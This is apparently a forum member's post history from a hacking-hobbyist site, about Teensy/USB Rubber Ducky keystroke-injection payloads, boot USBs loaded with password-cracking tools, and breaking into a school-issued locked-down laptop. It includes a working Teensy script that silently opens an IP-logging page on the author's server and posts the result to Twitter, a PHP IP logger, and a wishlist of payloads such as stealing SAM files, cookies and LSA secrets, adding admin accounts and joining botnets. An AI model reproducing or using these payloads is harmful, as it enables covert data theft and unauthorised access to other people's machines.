-
Posts
20 -
Joined
-
Last visited
Posts posted by iann0036
-
-
Seeing the new SD card board...and being a compulsive buyer <_< I've ordered the SD card reader.
Taking idea's from other people, I'd like to talk about things we can do with this.
Pwn Counter: Write a counter of how many boxes you pwn. Classic :P
DuckySwitchBladeHackSaw: Whatever you want to call it, it's an idea of combining the USB Hacks project with this by manipulating keyboard/mouse to disable any defenses against the auto-run of USB Flash drive executables
Bootable OS: This was hinted on by another poster regarding CD-ROM emulation. Alot of modern computers now have bootable drives as an option in their BIOS'es. The USB Multipass is also a great project to integrate into this.
Automatic Backup: Using the board as a backup is a bit of overkill for this project, but it'd be great if you were say, in the computer repair business and needed a quick way to backup files.
Steal all of NSA's blacklisted files: There's really no limit's (well, maybe some) to what we can do with this project. Comment any other ideas :D
[Quick offtopic note] The teensy++ with pins works great as a hairbrush...no seriously! [/offtopic]
-
Spammer
7-Segment Display Patterns
Enable autorun
Silent VNC Server
Enable RDP
Disable UAC
MSISilent(Un)install
Open ports
Delete system critical files
Disable mouse/keyboard on loop
Open webpage (or single ping) & obtain IP address
Post to:
-Personal Site
-Personal Twitter
-Victim's Myspace
-Victim's Twitter
-Victim's Facebook
Steal cookies
Shutdown/Hibernate/Sleep
FTP trojans
Upload victim's personal documents
Add admin account
Steal SAM files
LSA secrets
Webcam Spy
Add to botnet
Metasploit Payloads
Move CMD to lower right
Auto-login with username and password
Num/Caps lock flasher
Rick Rolling
-
@echo off for /f "tokens=2 delims=," %%a in ('systeminfo.exe /FO CSV') do ( set osver=%%a ) if %osver% == "Microsoft Windows 7 Home Premium " goto ver_7 goto warnthenexit :ver_7 :Run Windows 7 specific commands here. echo It's Windows 7 goto exit :ver_2008 :Run Windows Server 2008 specific commands here. echo It's Windows Server 2008 goto exit :ver_vista :Run Windows Vista specific commands here. echo It's Windows Vista goto exit :ver_2003 :Run Windows Server 2003 specific commands here. echo Windows Server 2003 goto exit :ver_xp :Run Windows XP specific commands here. echo It's Windows XP goto exit :ver_2000 :Run Windows 2000 specific commands here. echo It's Windows 2000 goto exit :ver_nt :Run Windows NT specific commands here. echo It's Windows NT goto exit :warnthenexit echo Machine undetermined. :exit
Some batch file code I'm working on (obviously not finished). To inspire.
-
Ever seen one of those usb ethernet adapters? How about a usb wifi adapter? Usb bluetooth adapter? All three receive packets from the computer. Some more interesting ideas would be pretend to be a pair of usb headphones...it'd be slower as you'd have to send the data back in blips, like morsecode. Give every character it's own frequency, then instead of checking the sound itself just have the teensy check the frequency of it and use that as input to it. It's a little round-a-bout and inefficient but an interesting thought. No offense but any of these are better than the monitor idea (simply because guessing at the computer default monitor setup would be guesswork at best and if it's set up as extended desktop you'd run into problems. And of course the easiest way for input would be, as other topics are discussing, emulate a flash drive (personally i'd emulate an external hdd, in most networks they're not locked down. My network for example does not allow applications to run from flash drives but external hdds get around that) and just save files to that and have teensy read those files. Just a couple of quick thoughts, hope they help. I'm about to head of to newegg and browse there usb devices and see if I can think of any other ways to get data back, though personally i'm in favor of the ethernet adapter :)
See the "Duck Cans" post on this forum. Is this essentially what you are after?
Also, is there a way to provide power to the teensy via something other than USB bus (to save it's temporary storage whilst a computer restarts)...something like the Fon power pack but smaller ;) ?
-
I think what NanoyMaster is talking more along the lines of saving it to a file located on the server.
For example, the following ip.php would save the content to ips.txt
<? $data = "IP: " . $_SERVER['REMOTE_ADDR'] . "\n"; $log_file = "ips.txt"; $f = fopen($log_file, 'a'); fwrite($f, $data); fclose($f); ?>
I see...yes this would work. The main problem that prevents the full potential of these projects is the fact we can't get feedback from the PC (other than maybe a Num Lock or so). How hard would it be to emulate a monitor and retrieve pixel colors?
-
I wasn't aware that you could copy to the clipboard from php. If I get time I'll modify the script and code.
-
// Post IP address to your Twitter // Based on Seshan 30/04/10 11:48 PM Twitter script int ledPin = 11; void setup() { pinMode(ledPin, OUTPUT); // put this before other led commands or the LED will be dim ledstart(); // lights up when connected delay(3000); // delay for computer ledstart(); // lights up when payload starts Keyboard.set_modifier(MODIFIERKEY_GUI); Keyboard.send_now(); Keyboard.set_key1(KEY_R); Keyboard.send_now(); Keyboard.set_key2(0); Keyboard.send_now(); d(); // this is a 100ms delay, see below for commands. Keyboard.print("http://iann0036.com/ip.php"); // goes to internet d(); enter(); delay(6000); // delay for browser to load Keyboard.set_modifier(MODIFIERKEY_CTRL); Keyboard.send_now(); Keyboard.set_key1(KEY_A); Keyboard.send_now(); Keyboard.set_key1(KEY_C); Keyboard.send_now(); Keyboard.set_key1(0); Keyboard.set_key2(0); Keyboard.set_modifier(0); Keyboard.send_now(); Keyboard.set_modifier(MODIFIERKEY_GUI); Keyboard.send_now(); Keyboard.set_key1(KEY_R); Keyboard.send_now(); Keyboard.set_key2(0); Keyboard.send_now(); d(); // this is a 100ms delay, see below for commands. Keyboard.print("http://twitter.com/login"); // goes to twitter d(); enter(); delay(9000); // delay for browser to load Keyboard.print("yourtwitterusername"); Keyboard.send_now(); d(); Keyboard.set_key2(KEY_TAB); Keyboard.send_now(); d(); Keyboard.print("yourtwitterpassword"); Keyboard.send_now(); enter(); delay(9000); Keyboard.set_modifier(MODIFIERKEY_CTRL); Keyboard.send_now(); Keyboard.set_key1(KEY_V); Keyboard.send_now(); Keyboard.set_modifier(0); Keyboard.send_now(); d(); Keyboard.set_key2(KEY_TAB); Keyboard.send_now(); enter(); Keyboard.set_key2(0); ledend(); delay(9000); } void loop() { } // hits enter void enter(){ Keyboard.set_key1(KEY_ENTER); Keyboard.send_now(); Keyboard.set_key1(0); Keyboard.send_now(); } // LED command for end of script. void ledend(){ Keyboard.set_key1(0); Keyboard.set_key2(0); Keyboard.set_modifier(0); Keyboard.send_now(); digitalWrite(ledPin, HIGH); delay (500); digitalWrite(ledPin, LOW); delay (500); digitalWrite(ledPin, HIGH); delay (500); digitalWrite(ledPin, LOW); } // LED command for start of script void ledstart(){ digitalWrite(ledPin, HIGH); delay (1000); digitalWrite(ledPin, LOW); } // delay 100ms void d(){ delay(100); }
Made from borrowed code. Comments?
-
Awesome!
Amazing pentesting tool :)
-
Referencing some posts,
http://hak5.org/forums/index.php?showtopic=14925
http://hak5.org/forums/index.php?showtopic=14922
http://www.fonerahacks.com/index.php/Tutor...-on-Fonera.html
Would I be able to do the Jasager project, Interceptor Project and be able to use the aircrack suite all with a Fon+ router like this one: http://www.amazon.com/Fon-FON2201B-Fonera-...6715&sr=8-1
(not at the same time of course)
-
Thinking about this myself, but the Chromium imager puts its files on a filesystem that's not readable (probably ext3 or similar). And since I'm not a linux nerd I couldn't be stuffed booting up GParted to see what filesystem it is actually on.
Oh, and I confirm 7-second boot time on USB :)
-
It's got an Administrators password. Right-clicking and selecting 'Run As Administrator' only brings up a password prompt.
-
There is a new comment on the post 'Unhackable Netbooks given to students'.
Author: Boeing
Comment:
I have one of these laptops and a few people have gotten suspended for 'hacking' them. They made it so that you cant open .exe files but all you do is run as admin, its really stupid and you can take apart the laptop with screwdrivers and lots of people have been doing. stupid school
See all comments on this post here: http://hackaday.com/2009/09/27/unhackable-...udents#comments
-
Cracking up hysterically about this thread. Did Darren say he was going to tell us a bit about what happened and never did? Just curious as to what kind of "hack" it was.
And as for the "1337 SKOOL HAX0R1NG" phase...educational institutions with all teachers details etc. with the default password of "admin" is not secure. Well done Department of Education and Training NSW :)
Keep it up and stay out of trouble.
-
You could try a live CD.................
Nope. BIOS is locked down from booting all but the internal HDD.
Torx?Yes. Torx, that's the one.
-
*Raises hand*
Another aussie! Shoalhaven, NSW here.
-
An old one :)
*Windows Vista Ultimate x64
* Used Rainmeter, Rainlendar, CD Art Display & Stardock's ObjectDock
* Enigma theme used for Rainmeter
* ObjectDock's 'Reserve edge of screen' feature bounds maximized windows within the four borders
-
Great thing this is! Here's my menu.lst file:
splashimage=/grub/wall.xpm.gz color blue/black yellow/blue timeout 20 title Boot Local Harddisk map (hd0) (hd1) map (hd1) (hd0) chainloader (hd1)+1 rootnoverify (hd1) title Kon-Boot map --mem /grub/konboot.img (fd0) map --hook chainloader (fd0)+1 map (hd1) (hd0) map --hook rootnoverify (fd0) title WinPE 2 map (hd0,0)/grub/winpe2.iso (hd32) map --hook chainloader (hd32) title Hirens map (hd0,0)/grub/hirens.iso (hd32) map --hook chainloader (hd32) title HawkPE ISO -null- map (hd0,0)/grub/HAWKPE.ISO (hd32) map --hook chainloader (hd32) title BT4 -null- configfile /grub/bt4/boot/grub/menu.lst title DBAN map (hd0,0)/grub/dban.iso (hd32) map --hook chainloader (hd32) title Ophcrack kernel /grub/ophcrack/boot/bzImage rw root=/dev/null vga=normal lang=C kmap=us screen=1024x768x16 autologin initrd /grub/ophcrack/boot/rootfs.gz title VistaPE find --set-root /grub/vistape/BOOTMGR chainloader /grub/vistape/BOOTMGR title Windows 7 Installation map (hd0,0)/grub/win7inst.iso (hd32) map --hook chainloader (hd32) title Windows 7 Recovery x86 map (hd0,0)/grub/win7recx86.iso (hd32) map --hook chainloader (hd32) title Windows 7 Recovery x64 map (hd0,0)/grub/win7recx64.iso (hd32) map --hook chainloader (hd32) title CloneZilla map (hd0,0)/grub/clonezilla.iso (hd32) map --hook chainloader (hd32) title FreeDOS map (hd0,0)/grub/freedos.iso (hd32) map --hook chainloader (hd32) title Kaspersky Rescue CD map (hd0,0)/grub/kasperrescue.iso (hd32) map --hook chainloader (hd32) title Puppy Linux map (hd0,0)/grub/puppy.iso (hd32) map --hook chainloader (hd32) title NTPasswd root (hd0,0) kernel /grub/ntpasswd/vmlinuz rw vga=1 initrd=/grub/ntpasswd/initrd.cgz /grub/ntpasswd/scsi.cgz title SpinRite map (hd0,0)/grub/SpinRite.iso (hd32) map --hook chainloader (hd32)
Works:
*Boot Local Harddisk
*Kon-Boot
*WinPE 2
*Hirens
*DBAN
*Ophcrack
*VistaPE
*Windows 7 Installation
*NTPasswd
*SpinRite
Doesn't Work:
*HawkPE
*BT4
*Windows 7 Recovery x86 & x64
*CloneZilla
*FreeDOS
*Kaspersky Rescue CD
*Puppy Linux
Still doing my research and figuring things out...that is, when I get my internet connection back from it's shaping :(
-
Or grabbing the SAM's remotely somehow..and I wasn't referring to the 'true aussies' :)
Live hacking (soft only) via DimDim anyone?
-
I’ve actually got my hands on one of these ‘unhackable’ laptops. The Windows portion itself has been locked down from the ground up (any EXE’s from an external source will not run, I tried some CMOS flashers). The applications that are pre-installed on these laptops are basic like 7-Zip. They are maintained by the Department of Education and Training of New South Wales by re-imaging them via Remote Desktop. If you try to access the BIOS the computer will immediately restart. I have no idea how they’ve done this. There is also a Windows Recovery Environment Partition on it for boot manager recovery I assume. They have a built-in hardware GPS which is apparently “monitored” by the local police force. The IdeaPad laptops came in either red or blue and have Crimestoppers logo and telephone number on the base of the laptop and integrated in the Windows 7 Logon Menu (in the lower left corner). It need’s a special 6 pointed screwdriver to access the inside of the device but I wouldn’t want to as tampering with the device apparently alerts the police.
Does anyone want to help me hack it (on a software level)? Perhaps a meeting in a DimDim room? Please note that this is Australia...the time is different here you silly Americans :P
[Version 1] Sd Card Development
in Classic USB Rubber Ducky
Posted
I've been working on this too,
You need to download a library to allow the Teensy to use the card, something like sdfatlib: http://code.google.com/p/sdfatlib/